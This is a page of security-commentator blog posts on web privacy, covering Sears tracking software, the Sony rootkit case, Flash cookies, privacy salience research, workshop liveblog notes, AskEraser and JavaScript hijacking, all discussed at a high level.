Entries Tagged "web privacy"

Page 4 of 5

Sears Spies on its Customers

It’s not just hackers who steal financial and medical information:

Between April 2007 and January 2008, visitors to the Kmart and Sears web sites were invited to join an “online community” for which they would be paid $10 with the idea they would be helping the company learn more about their customers. It turned out they learned a lot more than participants realized or that the feds thought was reasonable.

To join the “My SHC Community,” users downloaded software that ended up grabbing some members’ prescription information, emails, bank account data and purchases on other sites.

Reminds me of the 2005 Sony rootkit, which—oddly enough—is in the news again too:

After purchasing an Anastacia CD, the plaintiff played it in his computer but his anti-virus software set off an alert saying the disc was infected with a rootkit. He went on to test the CD on three other computers. As a result, the plaintiff ended up losing valuable data.

Claiming for his losses, the plaintiff demanded 200 euros for 20 hours wasted dealing with the virus alerts and another 100 euros for 10 hours spent restoring lost data. Since the plaintiff was self-employed, he also claimed for loss of profits and in addition claimed 800 euros which he paid to a computer expert to repair his network after the infection. Added to this was 185 euros in legal costs making a total claim of around 1,500 euros.

The judge’s assessment was that the CD sold to the plaintiff was faulty, since he should be able to expect that the CD could play on his system without interfering with it.

The court ordered the retailer of the CD to pay damages of 1,200 euros.

Posted on September 24, 2009 at 6:37 AMView Comments

Flash Cookies

Flash has the equivalent of cookies, and they’re hard to delete:

Unlike traditional browser cookies, Flash cookies are relatively unknown to web users, and they are not controlled through the cookie privacy controls in a browser. That means even if a user thinks they have cleared their computer of tracking objects, they most likely have not.

What’s even sneakier?

Several services even use the surreptitious data storage to reinstate traditional cookies that a user deleted, which is called ‘re-spawning’ in homage to video games where zombies come back to life even after being “killed,” the report found. So even if a user gets rid of a website’s tracking cookie, that cookie’s unique ID will be assigned back to a new cookie again using the Flash data as the “backup.”

Posted on August 17, 2009 at 6:36 AMView Comments

Privacy Salience and Social Networking Sites

Reassuring people about privacy makes them more, not less, concerned. It’s called “privacy salience,” and Leslie John, Alessandro Acquisti, and George Loewenstein—all at Carnegie Mellon University—demonstrated this in a series of clever experiments. In one, subjects completed an online survey consisting of a series of questions about their academic behavior—”Have you ever cheated on an exam?” for example. Half of the subjects were first required to sign a consent warning—designed to make privacy concerns more salient—while the other half did not. Also, subjects were randomly assigned to receive either a privacy confidentiality assurance, or no such assurance. When the privacy concern was made salient (through the consent warning), people reacted negatively to the subsequent confidentiality assurance and were less likely to reveal personal information.

In another experiment, subjects completed an online survey where they were asked a series of personal questions, such as “Have you ever tried cocaine?” Half of the subjects completed a frivolous-looking survey—”How BAD are U??”—with a picture of a cute devil. The other half completed the same survey with the title “Carnegie Mellon University Survey of Ethical Standards,” complete with a university seal and official privacy assurances. The results showed that people who were reminded about privacy were less likely to reveal personal information than those who were not.

Privacy salience does a lot to explain social networking sites and their attitudes towards privacy. From a business perspective, social networking sites don’t want their members to exercise their privacy rights very much. They want members to be comfortable disclosing a lot of data about themselves.

Joseph Bonneau and Soeren Preibusch of Cambridge University have been studying privacy on 45 popular social networking sites around the world. (You may not have realized that there are 45 popular social networking sites around the world.) They found that privacy settings were often confusing and hard to access; Facebook, with its 61 privacy settings, is the worst. To understand some of the settings, they had to create accounts with different settings so they could compare the results. Privacy tends to increase with the age and popularity of a site. General-use sites tend to have more privacy features than niche sites.

But their most interesting finding was that sites consistently hide any mentions of privacy. Their splash pages talk about connecting with friends, meeting new people, sharing pictures: the benefits of disclosing personal data.

These sites do talk about privacy, but only on hard-to-find privacy policy pages. There, the sites give strong reassurances about their privacy controls and the safety of data members choose to disclose on the site. There, the sites display third-party privacy seals and other icons designed to assuage any fears members have.

It’s the Carnegie Mellon experimental result in the real world. Users care about privacy, but don’t really think about it day to day. The social networking sites don’t want to remind users about privacy, even if they talk about it positively, because any reminder will result in users remembering their privacy fears and becoming more cautious about sharing personal data. But the sites also need to reassure those “privacy fundamentalists” for whom privacy is always salient, so they have very strong pro-privacy rhetoric for those who take the time to search them out. The two different marketing messages are for two different audiences.

Social networking sites are improving their privacy controls as a result of public pressure. At the same time, there is a counterbalancing business pressure to decrease privacy; watch what’s going on right now on Facebook, for example. Naively, we should expect companies to make their privacy policies clear to allow customers to make an informed choice. But the marketing need to reduce privacy salience will frustrate market solutions to improve privacy; sites would much rather obfuscate the issue than compete on it as a feature.

This essay originally appeared in the Guardian.

Posted on July 16, 2009 at 6:05 AMView Comments

Second SHB Workshop Liveblogging (6)

The first session of the morning was “Foundations,” which is kind of a catch-all for a variety of things that didn’t really fit anywhere else. Rachel Greenstadt moderated.

Terence Taylor, International Council for the Live Sciences (suggested video to watch: Darwinian Security; Natural Security), talked about the lessons evolution teaches about living with risk. Successful species didn’t survive by eliminating the risks of their environment, they survived by adaptation. Adaptation isn’t always what you think. For example, you could view the collapse of the Soviet Union as a failure to adapt, but you could also view it as successful adaptation. Risk is good. Risk is essential for the survival of a society, because risk-takers are the drivers of change. In the discussion phase, John Mueller pointed out a key difference between human and biological systems: humans tend to respond dramatically to anomalous events (the anthrax attacks), while biological systems respond to sustained change. And David Livingstone Smith asked about the difference between biological adaptation that affects the reproductive success of an organism’s genes, even at the expense of the organism, with security adaptation. (I recommend the book he edited: Natural Security: A Darwinian Approach to a Dangerous World.)

Andrew Odlyzko, University of Minnesota (suggested reading: Network Neutrality, Search Neutrality, and the Never-Ending Conflict between Efficiency and Fairness in Markets, Economics, Psychology, and Sociology of Security), discussed human-space vs. cyberspace. People cannot build secure systems—we know that—but people also cannot live with secure systems. We require a certain amount of flexibility in our systems. And finally, people don’t need secure systems. We survive with an astounding amount of insecurity in our world. The problem with cyberspace is that it was originally conceived as separate from the physical world, and that it could correct for the inadequacies of the physical world. Really, the two are intertwined, and that human space more often corrects for the inadequacies of cyberspace. Lessons: build messy systems, not clean ones; create a web of ties to other systems; create permanent records.

danah boyd, Microsoft Research (suggested reading: Taken Out of Context—American Teen Sociality in Networked Publics), does ethnographic studies of teens in cyberspace. Teens tend not to lie to their friends in cyberspace, but they lie to the system. Since an early age, they’ve been taught that they need to lie online to be safe. Teens regularly share their passwords: with their parents when forced, or with their best friend or significant other. This is a way of demonstrating trust. It’s part of the social protocol for this generation. In general, teens don’t use social media in the same way as adults do. And when they grow up, they won’t use social media in the same way as today’s adults do. Teens view privacy in terms of control, and take their cues about privacy from celebrities and how they use social media. And their sense of privacy is much more nuanced and complicated. In the discussion phase, danah wasn’t sure whether the younger generation would be more or less susceptible to Internet scams than the rest of us—they’re not nearly as technically savvy as we might think they are. “The only thing that saves teenagers is fear of their parents”; they try to lock them out, and lock others out in the process. Socio-economic status matters a lot, in ways that she is still trying to figure out. There are three different types of social networks: personal networks, articulated networks, and behavioral networks, and they’re different.

Mark Levine, Lancaster University (suggested reading: The Kindness of Crowds; Intra-group Regulation of Violence: Bystanders and the (De)-escalation of Violence), does social psychology. He argued against the common belief that groups are bad (mob violence, mass hysteria, peer group pressure). He collected data from UK CCTV cameras, searches for aggressive behavior, and studies when and how bystanders either help escalate or de-escalate the situations. Results: as groups get bigger, there is no increase of anti-social acts and a significant increase in pro-social acts. He has much more analysis and results, too complicated to summarize here. One key finding: when a third party intervenes in an aggressive interaction, it is much more likely to de-escalate. Basically, groups can act against violence. “When it comes to violence (and security), group processes are part of the solution—not part of the problem?”

Jeff MacKie-Mason, University of Michigan (suggested reading: Humans are smart devices, but not programmable; Security when people matter; A Social Mechanism for Supporting Home Computer Security), is an economist: “Security problems are incentive problems.” He discussed motivation, and how to design systems to take motivation into account. Humans are smart devices; they can’t be programmed, but they can be influenced through the sciences of motivational behavior: microeconomics, game theory, social psychology, psychodynamics, and personality psychology. He gave a couple of general examples of how these theories can inform security system design.

Joe Bonneau, Cambridge University, talked about social networks like Facebook, and privacy. People misunderstand why privacy and security is important in social networking sites like Facebook. People underestimate of what Facebook really is; it really is a reimplementation of the entire Internet. “Everything on the Internet is becoming social,” and that makes security different. Phishing is different, 419-style scams are different. Social context makes some scams easier; social networks are fun, noisy, and unpredictable. “People use social networking systems with their brain turned off.” But social context can be used to spot frauds and anomalies, and can be used to establish trust.

Three more sessions to go. (I am enjoying liveblogging the event. It’s helping me focus and pay closer attention.)

Adam Shostack’s liveblogging is here. Ross Anderson’s liveblogging is in his blog post’s comments. Matt Blaze’s audio is here.

Posted on June 12, 2009 at 9:54 AMView Comments

An Expectation of Online Privacy

If your data is online, it is not private. Oh, maybe it seems private. Certainly, only you have access to your e-mail. Well, you and your ISP. And the sender’s ISP. And any backbone provider who happens to route that mail from the sender to you. And, if you read your personal mail from work, your company. And, if they have taps at the correct points, the NSA and any other sufficiently well-funded government intelligence organization—domestic and international.

You could encrypt your mail, of course, but few of us do that. Most of us now use webmail. The general problem is that, for the most part, your online data is not under your control. Cloud computing and software as a service exacerbate this problem even more.

Your webmail is less under your control than it would be if you downloaded your mail to your computer. If you use Salesforce.com, you’re relying on that company to keep your data private. If you use Google Docs, you’re relying on Google. This is why the Electronic Privacy Information Center recently filed a complaint with the Federal Trade Commission: many of us are relying on Google’s security, but we don’t know what it is.

This is new. Twenty years ago, if someone wanted to look through your correspondence, he had to break into your house. Now, he can just break into your ISP. Ten years ago, your voicemail was on an answering machine in your office; now it’s on a computer owned by a telephone company. Your financial accounts are on remote websites protected only by passwords; your credit history is collected, stored, and sold by companies you don’t even know exist.

And more data is being generated. Lists of books you buy, as well as the books you look at, are stored in the computers of online booksellers. Your affinity card tells your supermarket what foods you like. What were cash transactions are now credit card transactions. What used to be an anonymous coin tossed into a toll booth is now an EZ Pass record of which highway you were on, and when. What used to be a face-to-face chat is now an e-mail, IM, or SMS conversation—or maybe a conversation inside Facebook.

Remember when Facebook recently changed its terms of service to take further control over your data? They can do that whenever they want, you know.

We have no choice but to trust these companies with our security and privacy, even though they have little incentive to protect them. Neither ChoicePoint, Lexis Nexis, Bank of America, nor T-Mobile bears the costs of privacy violations or any resultant identity theft.

This loss of control over our data has other effects, too. Our protections against police abuse have been severely watered down. The courts have ruled that the police can search your data without a warrant, as long as others hold that data. If the police want to read the e-mail on your computer, they need a warrant; but they don’t need one to read it from the backup tapes at your ISP.

This isn’t a technological problem; it’s a legal problem. The courts need to recognize that in the information age, virtual privacy and physical privacy don’t have the same boundaries. We should be able to control our own data, regardless of where it is stored. We should be able to make decisions about the security and privacy of that data, and have legal recourse should companies fail to honor those decisions. And just as the Supreme Court eventually ruled that tapping a telephone was a Fourth Amendment search, requiring a warrant—even though it occurred at the phone company switching office and not in the target’s home or office—the Supreme Court must recognize that reading personal e-mail at an ISP is no different.

This essay was originally published on the SearchSecurity.com website, as the second half of a point/counterpoint with Marcus Ranum.

Posted on May 5, 2009 at 6:06 AMView Comments

Online Age Verification

A discussion of a security trade-off:

Child-safety activists charge that some of the age-verification firms want to help Internet companies tailor ads for children. They say these firms are substituting one exaggerated threat—the menace of online sex predators—with a far more pervasive danger from online marketers like junk food and toy companies that will rush to advertise to children if they are told revealing details about the users.

It’s an old story: protecting against the rare and spectacular by making yourself more vulnerable to the common and pedestrian.

Posted on November 21, 2008 at 11:47 AMView Comments

Privacy Problems with AskEraser

Last week, Ask.com announced a feature called AskEraser (good description here), which erases a user’s search history. While it’s great to see companies using privacy features for competitive advantage, EPIC examined the feature and wrote to the company with some problems:

The first one is the fact that AskEraser uses an opt-out cookie. Cookies are bits of software left on a consumer’s computer that are used to authenticate the user and maintain information such as the user’s site preferences.

Usually, people concerned with privacy delete cookies, so creating an opt-out cookie is “counter-intuitive,” the letter states. Once the AskEraser opt-out cookie is deleted, the privacy setting is lost and the consumer’s search activity will be tracked. Why not have an opt-in cookie instead, the letter suggests.

The second problem is that Ask inserts the exact time that the user enables AskEraser and stores it in the cookie, which could make identifying the computer easier and make it easy for third-party tracking if the cookie were transferred to such parties. The letter recommends using a session cookie that expires once the search result is returned.

Ask’s Frequently Asked Questions for the feature notes that there may be circumstances when Ask is required to comply with a court order and if asked to, it will retain the consumer’s search data even if AskEraser appears to be turned on. Ask should notify consumers when the feature has been disabled so that people are not misled into thinking their searches aren’t being tracked when they actually are, the letter said.

Here’s a copy of the letter, signed by eight privacy organizations. Still no word from Ask.com.

While I have your attention, I want to talk about EPIC. This is exactly the sort of thing the Electronic Privacy Information Center does best. Whether it’s search engine privacy, electronic voting, ID cards, or databases and data mining, EPIC is always at the forefront of these sorts of privacy issues. It’s the end of the year, and lots of people are looking for causes worthy of donation. Here’s EPIC’s donation page; they—well, “we” really, as I’m on the board—can use the support.

Posted on December 21, 2007 at 11:18 AMView Comments

JavaScript Hijacking

Interesting paper on JavaScript Hijacking: a new type of eavesdropping attack against Ajax-style Web applications. I’m pretty sure it’s the first type of attack that specifically targets Ajax code. The attack is possible because Web browsers don’t protect JavaScript the same way they protect HTML; if a Web application transfers confidential data using messages written in JavaScript, in some cases the messages can be read by an attacker.

The authors show that many popular Ajax programming frameworks do nothing to prevent JavaScript hijacking. Some actually require a programmer to create a vulnerable server in order to function.

Like so many of these sorts of vulnerabilities, preventing the class of attacks is easy. In many cases, it requires just a few additional lines of code. And like so many software security problems, programmers need to understand the security implications of their work so that they can mitigate the risks they face. But my guess is that JavaScript hijacking won’t be solved so easily, because programmers don’t understand the security implications of their work and won’t prevent the attacks.

Posted on April 2, 2007 at 3:45 PMView Comments

Sidebar photo of Bruce Schneier by Joe MacInnis.